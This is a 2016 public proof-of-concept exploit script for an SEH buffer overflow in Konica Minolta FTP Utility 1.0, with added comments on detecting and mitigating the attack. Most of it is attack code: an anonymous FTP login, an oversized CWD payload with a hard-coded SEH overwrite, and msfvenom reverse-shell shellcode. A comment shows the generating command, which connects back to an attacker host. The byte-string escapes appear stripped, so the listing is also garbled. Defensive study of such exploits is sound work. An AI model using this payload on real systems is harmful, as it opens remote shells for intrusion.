Konica Minolta FTP Utility 1.0 SEH Buffer Overflow
Posted on 31 May 2016
# Public proof-of-concept (2016) for an SEH-overwrite stack buffer overflow in
# Konica Minolta FTP Utility 1.0: after an anonymous login, an oversized
# argument to the FTP CWD command overwrites the process's SEH record.
#
# Defender notes:
#  - Detection: the CWD argument sent below is several kilobytes long
#    (1037 + 4 + 4 + 20 + shellcode + 500 bytes), far beyond any real path;
#    alerting on oversized FTP command arguments catches this class of attack.
#  - Mitigation: the technique relies on a hard-coded SEH handler address and
#    on executing code from the stack; SafeSEH/SEHOP, DEP and ASLR are the
#    standard host-side counters (not verified against this binary here), and
#    the vulnerable utility should be patched or retired and FTP exposure
#    limited to trusted networks.
#  - Written in Python 2 syntax (print statement).
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Padding that fills the stack buffer up to the SEH record; the original
# comment says "EIP", but what follows the padding is the nSEH/SEH pair.
junk = "x41" * 1037 #offset to EIP

# Shellcode as produced by msfvenom (reverse shell, encoded to avoid the
# listed bad characters); reproduced unchanged from the original post.
#msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.41.55 LPORT=4444 -e x86/shikata_ga_nai -b "x00x0dx0ax3dx5cx2f" -i 3 -f python (replace LHOST with an attacker's IP)
buf = ""
buf += "xdbxd2xbfxccxeex99xa8xd9x74x24xf4x5dx2b"
buf += "xc9xb1x5fx83xedxfcx31x7dx15x03x7dx15x2e"
buf += "x1bx22x04x1bxadxccx8fxb3xf7x9bx0bxc7x56"
buf += "x4dx9dx96x3fxbcx43xcdx3cx50x87xeex1cxbc"
buf += "x9axa9xc8x34x1ax9cxbexb0x57x29xe3xb4x80"
buf += "x3ax80x08xeex19xf4xd3xc7x43x35x0exb3x85"
buf += "x74x16x36x51xc5xa5xe0x5bxf0x29x11x62x83"
buf += "x56x98x21xeax69x23x10x7cx65x02x77x70xdc"
buf += "x5axd9x6exc5x55x07x15xbaxb4x10xf5xeex73"
buf += "xbcx17x68xe3x78x89x60x95x1cx62xbax1fx60"
buf += "xd8x65x41xf7x0cx30x56x08x79xd2x32x0ex03"
buf += "x56xbfx9exbfxf7xbaxe2xaax96x9dx1dx62xdd"
buf += "xa7xbbx40x53xa2x0fxd8x25x4ax4ex4dx38xa9"
buf += "xb6xb0x48x51xbax5ex6dx23x80xd4x45x61x14"
buf += "x82xc4x6dx69x93x19x69xe9x8cx24x01xb5x68"
buf += "xc4xfex95x69x0cxa1x71xd2x5dxb8x90x06x31"
buf += "xfaxfexf8x61x35x46xc8xcbxf8x57xacx85x06"
buf += "x2bx6dx02xb2x4bxcax0ex87xafx7dx43x6bx1c"
buf += "x03x42x13xfex16x9cx70xf2xafx34x6ex42x2b"
buf += "xbaxf2x62xdcx9ax55x4ax46x08x04x7ax8ex26"
buf += "x95xa8x72x8ex8cx83xefxcdxb6x10x91xfexda"
buf += "x3ax15xbax7cxefx24x1cx9dxb7x57xe9x60x7f"
buf += "x06xd3xf6x7bx85x7bxd3xb2x8cx30x85xb7x56"
buf += "x41x7fx6cxabx01x7ax1bx77xcfxd5x0cx85xce"
buf += "xb6x6fx5fxfbxc7x43xc8x13xfexaexccxeaxe6"
buf += "x40x61x2cx75xdbx9ax6bx03x80xc1x69xc8x5f"
buf += "x16x31x16xf4x50x45x99xa9xc5x7fxa0x64x59"
buf += "xb3x95xe1xb7xa6xe0x36x2axe3xc7xcbx09xb0"
buf += "x84x37x67xa2x91xbdxb8x38x26x68xa8x67x81"
buf += "x5ex89xf8xf3x30xd2xc2x37x25x2dx99xf2xad"
buf += "x34xdfx21x2bx43xcdx18xa0x95x9exa9xe4x44"
buf += "xb0xcd"

# Classic SEH-overwrite layout: nSEH is overwritten with a short forward jump
# (EB 10) over the SEH slot, SEH with a fixed handler address (presumably a
# gadget in a module without SafeSEH; not verifiable from this listing).
# Hard-coded addresses like this are exactly what ASLR is meant to defeat.
nseh = "xebx10x90x90"
seh = "xb0x63x20x12"

# Full CWD argument: padding, nSEH, SEH, NOP sled, shellcode, trailing filler.
exploit = junk + nseh + seh + "x90" *20 + buf + "x42" * 500

print "sending"
s.connect(('x.x.x.x',21)) # Insert target IP
data = s.recv(1024)
s.send('USER anonymous' + ' ')
data = s.recv(1024)
s.send('PASS anonymous' + ' ')
data = s.recv(1024)
s.send('CWD ' +exploit+ ' ')
# Bare attribute reference, not a call: the socket is never explicitly closed
# and is only reclaimed when the interpreter exits.
s.close